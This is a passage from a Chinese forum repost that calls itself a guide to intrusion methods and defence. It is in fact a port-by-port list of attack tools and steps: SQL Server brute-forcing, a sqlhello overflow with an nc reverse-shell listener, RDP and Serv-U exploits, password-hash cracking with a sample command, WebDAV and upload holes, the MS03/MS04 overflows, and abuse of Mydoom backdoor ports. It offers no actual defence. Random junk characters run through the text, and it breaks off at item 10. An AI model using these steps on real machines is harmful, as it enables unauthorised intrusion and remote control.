入侵方法以及工具防范
转自:杜松之家1 s$ l3 {9 h1 s- M! _; `1 _
6 K2 Q5 x/ j: ~4 e# S' L9 A" q: V; ~. T O$ s
http://www.juniperbbs.net/viewthread.php?tid=15268&frameon=no% U& B& D5 d3 A
工欲善其事,必先利其器,本文简单介绍目前黑客最常使用的一些入侵工具及防御的方法,希望能对大家有所帮助,以助于大家能更好地防御黑客的攻击。
6 b) b3 `4 k$ x0 Q
( ?2 ^0 Z G: Q$ E) m! h2 L- u" \; K! D _! _
1. 1433端口入侵
. |) F/ C- ^% U7 g, U* r% ], D1 b
scanport.exe 查有1433的机器
4 m; r& D# C# Q' W/ s3 f" c0 ]/ k5 v( z7 }1 O! Q0 c9 h
SQLScanPass.exe 进行字典暴破(字典是关键)
/ G) R# V6 Y4 J, Z! s0 | H" H. r- e H' X$ s1 F4 G6 _, Q8 r1 j
最后 SQLTools.exe入侵 8 \. k' q4 O% S, b+ n3 d
! e6 @. N- T( C- d$ f1 x ============================= # {4 f, h; j+ x4 M
. l; r9 k. a1 U( W2 \( w
对sql的sp2及以下的系统,可用sql的hello 溢出漏洞入侵。
/ l [9 N, X! m) D5 z& c& K9 i; T9 q) X( g
nc -vv -l -p 本机端口 sqlhelloF.exe 入侵ip 1433 本机ip 本机端口
% A1 I" A% V% _; v6 x& i1 `7 w, W+ H/ J3 n/ d6 e5 G
(以上反向的,测试成功) 1 h( z1 j* ]$ \& ~- U+ _/ C
9 t9 k) X5 {$ t+ o- C% s/ z& ? sqlhelloz.exe 入侵ip 1433 (这个是正向连接)
& N" R$ C9 T" V4 Y
# d/ r2 W1 A a9 ?/ J 2. 4899端口入侵 2 M# A6 ]3 P: H
2 ~' \( }" R0 i6 A. t6 C" H 用4899过滤器.exe,扫描空口令的机器 7 G% q: B C. d \8 e. l6 v
' \! x* e# G- v# r6 I
B3 |6 |7 k! c% T0 c9 f 3. 3899的入侵
) S0 ?- @: \5 A% C- _/ v! c- M; n: U/ n6 k: N' G) s$ l- q
对很早的机器,可以试试3389的溢出(win3389ex.exe) , r2 c, r5 \7 D0 V3 N+ w
, z h8 F4 r- x( _- G; h 对2000的机器,可以试试字典暴破。(tscrack.exe) 6 @& \. p6 f- ^3 S
- l5 N0 x r# n, M
4. 80入侵 ! J, e: i5 J: X+ i
& }( M: i, K. ]% e$ A5 U
对sp3以前的机器,可以用webdav入侵;
% W* m) ]' T8 Y
+ Y% X& L5 q5 P; }+ z! n 对bbs论坛,可以试试上传漏洞(upfile.exe或dvup_delphi.exe) 0 C, w' N% i) n1 u
Q* m) s; ?# u7 S ]% B 可以利用SQL进行注入。(小榕的注入软件)。
! y; q2 \( H$ I
2 e6 j! [' O6 Y5 `7 {, Z; X+ o( \ 5. serv-u入侵(21端口) . S2 h3 ^+ `8 t' u2 w. ^" q) r
. I% L3 w' o: O8 O
对5. 004及以下系统,可用溢出入侵。(serv5004.exe)
) Q6 U& l9 V) N: q
. t- _2 u% m6 K$ P1 C* H 对5.1.0.0及以下系统,可用本地提升权限。(servlocal.exe) . S' d0 w8 |! @' F
( M& C9 `6 d+ }8 w+ Y$ N% C ======================================
" d% P9 `" ?9 `# D6 {& L$ `+ G" q5 P2 }+ p' s" h
对serv-u的MD5加密密码,可以用字典暴破。(crack.vbs) 1 A, \, \1 }5 [/ M& X2 G
' q+ u) S r1 B' [5 k: i 输入一个被serv-u加密的密码(34位长),通过与字典档(dict.txt)的比较,得到密码。如:cscript crack.vbs ib0AD10648F17E9E8D1FF316C1BA75105A
9 A# M6 ^# g3 d9 X8 J; K& m1 t
1 s( g q0 m% F: p) | J( A 6. 554端口
5 f! a/ c/ B3 `3 v- n4 I7 N" ~: f, d+ J) d
用real554.exe入侵。 & T3 _8 W' v* S+ E; o J7 X. B. F
. g% D0 f# z; v3 q& {: G 7. 6129端口
2 m5 V/ a+ X' n# S. r; p
7 F8 K4 H: k; F; n5 n9 s 用DameWare6129.exe入侵。
/ r5 a! }& }4 G' A/ y- W# q
8 C* D' P6 A: x e5 g 8. 系统漏洞
2 g/ y" A7 i6 s& Q
# e4 J! o1 r- L4 g4 ?/ w3 T 利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞,
9 u% U; K8 a. M! O2 D$ g& ]+ L/ Y0 |; j
进行溢出入侵。
. d, m! F6 I: E$ T6 l8 e: J t x2 g; B3 M' G4 \4 A8 |
9. 3127等端口
# |5 V$ |+ k/ {& X! e% w4 s& a4 Y0 ~- V
可以利用doom病毒开的端口,用nodoom.exe入侵。(可用mydoomscan.exe查)。
H r) i5 b" E; V/ o$ n" r! Q/ A: X5 a4 n
10. 其他入侵
